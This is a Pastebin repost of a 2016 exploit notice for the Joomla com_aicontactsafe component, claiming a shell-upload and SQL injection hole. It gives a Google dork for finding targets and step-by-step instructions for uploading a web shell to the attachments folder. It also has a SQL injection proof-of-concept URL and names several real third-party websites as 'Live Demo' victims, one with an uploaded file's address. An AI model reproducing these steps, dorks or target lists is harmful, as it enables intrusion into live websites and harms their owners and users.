Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ######################
- # Exploit Title : Joomla com_aicontactsafe Arbitrary File Upload / SQL injection Vulnerability
- # Exploit Author : D.R.S Dz Team
- # Dork : inurl:index.php?option=com_aicontactsafe
- # Software link : http://www.algisinfo.com/en/download/category/1-free-extensions.html
- # Vendor Homepage : http://www.algisinfo.com/
- # version : 2.0.20
- # Tested on: [ Windows]
- # skype:xbadgirl21
- # Date: 2016/07/18
- # video Proof : https://youtu.be/PdDmThHGVz8
- ######################
- # [+] FILE UPLOAD :
- ######################
- ######################
- # [+] DESCRIPTION :
- ######################
- # [+] aiContactSafe is An AJAX driven component to place a contact form anywhere on your web page
- # [+] with any number of custom fields of different types, including attachments.
- # [+] and an Shell Upload and SQLi has been Detected in this component
- ######################
- # [+] PoC :
- ######################
- # 1.- SELECT A WEBSITE FROM THE DORK ABOVE
- # 2.- http://localhost/site/index.php?option=com_aicontactsafe
- # 3.- check this Directory if you have Access to it : media/aicontactsafe/attachments
- # 4.- Just Upload your Shell or Txt or Image to Upload Field
- # 5.- Shell Directory : media/aicontactsafe/attachments/[RANDOME_NUM]Evi!l.php or the extension uploaded
- # Ex : http://malmoskyttegille.se/media/aicontactsafe/attachments/x_415.txt
- ######################
- # [+] Live Demo:
- ######################
- # http://malmoskyttegille.se/index.php?option=com_aicontactsafe
- ######################
- # [+] SQL injection:
- ######################
- # PoC :
- # http://www.site.com/index.php?option=com_aicontactsafe&field=1
- # AdminPanel :
- # http://www.site.com/administrator
- ######################
- # [+] Live Demo:
- ######################
- # http://www.esbrasil.net/portal/index.php?option=com_aicontactsafe&field=1
- # http://www.rustyspic-a-part.com/index.php?option=com_aicontactsafe&field=1
- ######################
- # Discovered by : xBADGIRL21
- # Greetz : All Mauritanien Hackers - NoWhere
- ######################
- # 0day.today [2016-07-20] #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement